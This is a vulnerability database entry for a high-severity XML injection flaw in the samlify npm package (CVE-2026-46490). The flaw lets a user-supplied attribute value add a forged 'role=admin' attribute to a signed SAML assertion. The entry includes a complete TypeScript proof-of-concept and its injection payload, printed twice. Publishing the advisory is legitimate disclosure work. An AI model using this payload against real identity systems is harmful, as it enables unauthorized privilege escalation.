GHSA-34R5-Q4JW-R36M

Vulnerability from github – Published: 2026-05-21 17:14 – Updated: 2026-06-09 13:12
VLAI
Summary
samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions
Details

Summary

samlify’s template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups).

Root Cause

src/libsaml.tsreplaceTagsByValue() only escapes placeholders when preceded by a quote (attribute context). Element text is inserted raw. The attribute builder inserts placeholders into element text:

<saml:AttributeValue ...>{attrUserX}</saml:AttributeValue>

Therefore, </saml:AttributeValue>…<saml:Attribute …> is accepted and signed.

Proof-of-concept

  • poc/attribute_injection.ts
import { readFileSync } from 'fs';
import * as samlify from '../index';
import * as validator from '@authenio/samlify-xsd-schema-validator';

samlify.setSchemaValidator(validator);

const { IdentityProvider, ServiceProvider, SamlLib: libsaml, Utility: util } = samlify as any;

const loginResponseTemplate = {
  context: '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="{ID}" Version="2.0" IssueInstant="{IssueInstant}" Destination="{Destination}" InResponseTo="{InResponseTo}"><saml:Issuer>{Issuer}</saml:Issuer><samlp:Status><samlp:StatusCode Value="{StatusCode}"/></samlp:Status><saml:Assertion ID="{AssertionID}" Version="2.0" IssueInstant="{IssueInstant}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:Issuer>{Issuer}</saml:Issuer><saml:Subject><saml:NameID Format="{NameIDFormat}">{NameID}</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="{SubjectConfirmationDataNotOnOrAfter}" Recipient="{SubjectRecipient}" InResponseTo="{InResponseTo}"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="{ConditionsNotBefore}" NotOnOrAfter="{ConditionsNotOnOrAfter}"><saml:AudienceRestriction><saml:Audience>{Audience}</saml:Audience></saml:AudienceRestriction></saml:Conditions>{AttributeStatement}</saml:Assertion></samlp:Response>',
  attributes: [
    { name: 'mail', valueTag: 'user.email', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
    { name: 'injection', valueTag: 'user.injection', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
  ],
};

const idp = IdentityProvider({
  privateKey: readFileSync('./test/key/idp/privkey.pem'),
  privateKeyPass: 'q9ALNhGT5EhfcRmp8Pg7e9zTQeP2x1bW',
  isAssertionEncrypted: false,
  metadata: readFileSync('./test/misc/idpmeta.xml'),
  loginResponseTemplate,
});

const sp = ServiceProvider({
  privateKey: readFileSync('./test/key/sp/privkey.pem'),
  privateKeyPass: 'VHOSp5RUiBcrsjrcAuXFwU1NKCkGA8px',
  isAssertionEncrypted: false,
  metadata: readFileSync('./test/misc/spmeta.xml'),
});

const buildTemplate = (_idp: any, _sp: any, _binding: any, user: any) => (template: string) => {
  const now = new Date();
  const fiveMinutesLater = new Date(now.getTime() + 300_000);
  const tvalue = {
    ID: _idp.entitySetting.generateID(),
    AssertionID: _idp.entitySetting.generateID(),
    Destination: _sp.entityMeta.getAssertionConsumerService('post'),
    Audience: _sp.entityMeta.getEntityID(),
    SubjectRecipient: _sp.entityMeta.getAssertionConsumerService('post'),
    NameIDFormat: 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress',
    NameID: user.email,
    Issuer: _idp.entityMeta.getEntityID(),
    IssueInstant: now.toISOString(),
    ConditionsNotBefore: now.toISOString(),
    ConditionsNotOnOrAfter: fiveMinutesLater.toISOString(),
    SubjectConfirmationDataNotOnOrAfter: fiveMinutesLater.toISOString(),
    InResponseTo: 'request-id',
    StatusCode: 'urn:oasis:names:tc:SAML:2.0:status:Success',
    attrUserEmail: user.email,
    attrUserInjection: user.injection,
  };

  return { id: tvalue.ID, context: libsaml.replaceTagsByValue(template, tvalue) };
};

async function main() {
  const injection = [
    'safe',
    '</saml:AttributeValue></saml:Attribute>',
    '<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
    '<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">admin</saml:AttributeValue>',
    '</saml:Attribute>',
    '<saml:Attribute Name="injection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
    '<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">safe'
  ].join('');

  const user = { email: 'user@esaml2.com', injection };
  const { context: SAMLResponse } = await idp.createLoginResponse(
    sp,
    { extract: { request: { id: 'request-id' } } },
    'post',
    user,
    buildTemplate(idp, sp, 'post', user)
  );

  const xml = util.base64Decode(SAMLResponse, true).toString();
  console.log('--- Generated XML snippet ---');
  console.log(xml.slice(xml.indexOf('<saml:AttributeStatement'), xml.indexOf('</saml:AttributeStatement>') + 26));

  const { extract } = await sp.parseLoginResponse(idp, 'post', { body: { SAMLResponse } });

  console.log('Parsed attributes:', extract.attributes);
}

main().catch(err => {
  console.error('PoC failed:', err?.message || err);
  process.exitCode = 1;
});

Run:

  npm install --legacy-peer-deps
  npx ts-node poc/attribute_injection.ts

Impact

A normal user can inject arbitrary attributes (e.g., role=admin) into a signed assertion and have them parsed by sp.parseLoginResponse(). This can grant elevated privileges in SPs that trust SAML attributes.

Severity
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "samlify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46490"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-91"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T17:14:07Z",
    "nvd_published_at": "2026-06-08T19:16:45Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nsamlify\u2019s template substitution only escapes attribute contexts. Values inserted into element text (e.g., `\u003csaml:AttributeValue\u003e`) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new `\u003csaml:Attribute\u003e` elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups).\n\n## Root Cause\n\n`src/libsaml.ts` \u2192 `replaceTagsByValue()` only escapes placeholders when preceded by a quote (attribute context). Element text is inserted raw. The attribute builder inserts placeholders into element text:\n\n```\n\u003csaml:AttributeValue ...\u003e{attrUserX}\u003c/saml:AttributeValue\u003e\n```\n\nTherefore, `\u003c/saml:AttributeValue\u003e\u2026\u003csaml:Attribute \u2026\u003e` is accepted and signed.\n\n## Proof-of-concept\n\n- poc/attribute_injection.ts\n\n```TS\nimport { readFileSync } from \u0027fs\u0027;\nimport * as samlify from \u0027../index\u0027;\nimport * as validator from \u0027@authenio/samlify-xsd-schema-validator\u0027;\n\nsamlify.setSchemaValidator(validator);\n\nconst { IdentityProvider, ServiceProvider, SamlLib: libsaml, Utility: util } = samlify as any;\n\nconst loginResponseTemplate = {\n  context: \u0027\u003csamlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"{ID}\" Version=\"2.0\" IssueInstant=\"{IssueInstant}\" Destination=\"{Destination}\" InResponseTo=\"{InResponseTo}\"\u003e\u003csaml:Issuer\u003e{Issuer}\u003c/saml:Issuer\u003e\u003csamlp:Status\u003e\u003csamlp:StatusCode Value=\"{StatusCode}\"/\u003e\u003c/samlp:Status\u003e\u003csaml:Assertion ID=\"{AssertionID}\" Version=\"2.0\" IssueInstant=\"{IssueInstant}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\"\u003e\u003csaml:Issuer\u003e{Issuer}\u003c/saml:Issuer\u003e\u003csaml:Subject\u003e\u003csaml:NameID Format=\"{NameIDFormat}\"\u003e{NameID}\u003c/saml:NameID\u003e\u003csaml:SubjectConfirmation Method=\"urn:oasis:names:tc:SAML:2.0:cm:bearer\"\u003e\u003csaml:SubjectConfirmationData NotOnOrAfter=\"{SubjectConfirmationDataNotOnOrAfter}\" Recipient=\"{SubjectRecipient}\" InResponseTo=\"{InResponseTo}\"/\u003e\u003c/saml:SubjectConfirmation\u003e\u003c/saml:Subject\u003e\u003csaml:Conditions NotBefore=\"{ConditionsNotBefore}\" NotOnOrAfter=\"{ConditionsNotOnOrAfter}\"\u003e\u003csaml:AudienceRestriction\u003e\u003csaml:Audience\u003e{Audience}\u003c/saml:Audience\u003e\u003c/saml:AudienceRestriction\u003e\u003c/saml:Conditions\u003e{AttributeStatement}\u003c/saml:Assertion\u003e\u003c/samlp:Response\u003e\u0027,\n  attributes: [\n    { name: \u0027mail\u0027, valueTag: \u0027user.email\u0027, nameFormat: \u0027urn:oasis:names:tc:SAML:2.0:attrname-format:basic\u0027, valueXsiType: \u0027xs:string\u0027 },\n    { name: \u0027injection\u0027, valueTag: \u0027user.injection\u0027, nameFormat: \u0027urn:oasis:names:tc:SAML:2.0:attrname-format:basic\u0027, valueXsiType: \u0027xs:string\u0027 },\n  ],\n};\n\nconst idp = IdentityProvider({\n  privateKey: readFileSync(\u0027./test/key/idp/privkey.pem\u0027),\n  privateKeyPass: \u0027q9ALNhGT5EhfcRmp8Pg7e9zTQeP2x1bW\u0027,\n  isAssertionEncrypted: false,\n  metadata: readFileSync(\u0027./test/misc/idpmeta.xml\u0027),\n  loginResponseTemplate,\n});\n\nconst sp = ServiceProvider({\n  privateKey: readFileSync(\u0027./test/key/sp/privkey.pem\u0027),\n  privateKeyPass: \u0027VHOSp5RUiBcrsjrcAuXFwU1NKCkGA8px\u0027,\n  isAssertionEncrypted: false,\n  metadata: readFileSync(\u0027./test/misc/spmeta.xml\u0027),\n});\n\nconst buildTemplate = (_idp: any, _sp: any, _binding: any, user: any) =\u003e (template: string) =\u003e {\n  const now = new Date();\n  const fiveMinutesLater = new Date(now.getTime() + 300_000);\n  const tvalue = {\n    ID: _idp.entitySetting.generateID(),\n    AssertionID: _idp.entitySetting.generateID(),\n    Destination: _sp.entityMeta.getAssertionConsumerService(\u0027post\u0027),\n    Audience: _sp.entityMeta.getEntityID(),\n    SubjectRecipient: _sp.entityMeta.getAssertionConsumerService(\u0027post\u0027),\n    NameIDFormat: \u0027urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress\u0027,\n    NameID: user.email,\n    Issuer: _idp.entityMeta.getEntityID(),\n    IssueInstant: now.toISOString(),\n    ConditionsNotBefore: now.toISOString(),\n    ConditionsNotOnOrAfter: fiveMinutesLater.toISOString(),\n    SubjectConfirmationDataNotOnOrAfter: fiveMinutesLater.toISOString(),\n    InResponseTo: \u0027request-id\u0027,\n    StatusCode: \u0027urn:oasis:names:tc:SAML:2.0:status:Success\u0027,\n    attrUserEmail: user.email,\n    attrUserInjection: user.injection,\n  };\n\n  return { id: tvalue.ID, context: libsaml.replaceTagsByValue(template, tvalue) };\n};\n\nasync function main() {\n  const injection = [\n    \u0027safe\u0027,\n    \u0027\u003c/saml:AttributeValue\u003e\u003c/saml:Attribute\u003e\u0027,\n    \u0027\u003csaml:Attribute Name=\"role\" NameFormat=\"urn:oasis:names:tc:SAML:2.0:attrname-format:basic\"\u003e\u0027,\n    \u0027\u003csaml:AttributeValue xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"xs:string\"\u003eadmin\u003c/saml:AttributeValue\u003e\u0027,\n    \u0027\u003c/saml:Attribute\u003e\u0027,\n    \u0027\u003csaml:Attribute Name=\"injection\" NameFormat=\"urn:oasis:names:tc:SAML:2.0:attrname-format:basic\"\u003e\u0027,\n    \u0027\u003csaml:AttributeValue xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"xs:string\"\u003esafe\u0027\n  ].join(\u0027\u0027);\n\n  const user = { email: \u0027user@esaml2.com\u0027, injection };\n  const { context: SAMLResponse } = await idp.createLoginResponse(\n    sp,\n    { extract: { request: { id: \u0027request-id\u0027 } } },\n    \u0027post\u0027,\n    user,\n    buildTemplate(idp, sp, \u0027post\u0027, user)\n  );\n\n  const xml = util.base64Decode(SAMLResponse, true).toString();\n  console.log(\u0027--- Generated XML snippet ---\u0027);\n  console.log(xml.slice(xml.indexOf(\u0027\u003csaml:AttributeStatement\u0027), xml.indexOf(\u0027\u003c/saml:AttributeStatement\u003e\u0027) + 26));\n\n  const { extract } = await sp.parseLoginResponse(idp, \u0027post\u0027, { body: { SAMLResponse } });\n\n  console.log(\u0027Parsed attributes:\u0027, extract.attributes);\n}\n\nmain().catch(err =\u003e {\n  console.error(\u0027PoC failed:\u0027, err?.message || err);\n  process.exitCode = 1;\n});\n```\n\n**Run:**\n\n```\n  npm install --legacy-peer-deps\n  npx ts-node poc/attribute_injection.ts\n```\n\n## Impact \n\nA normal user can inject arbitrary attributes (e.g., `role=admin`) into a signed assertion and have them parsed by `sp.parseLoginResponse()`. This can grant elevated privileges in SPs that trust SAML attributes.",
  "id": "GHSA-34r5-q4jw-r36m",
  "modified": "2026-06-09T13:12:28Z",
  "published": "2026-05-21T17:14:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46490"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tngan/samlify"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.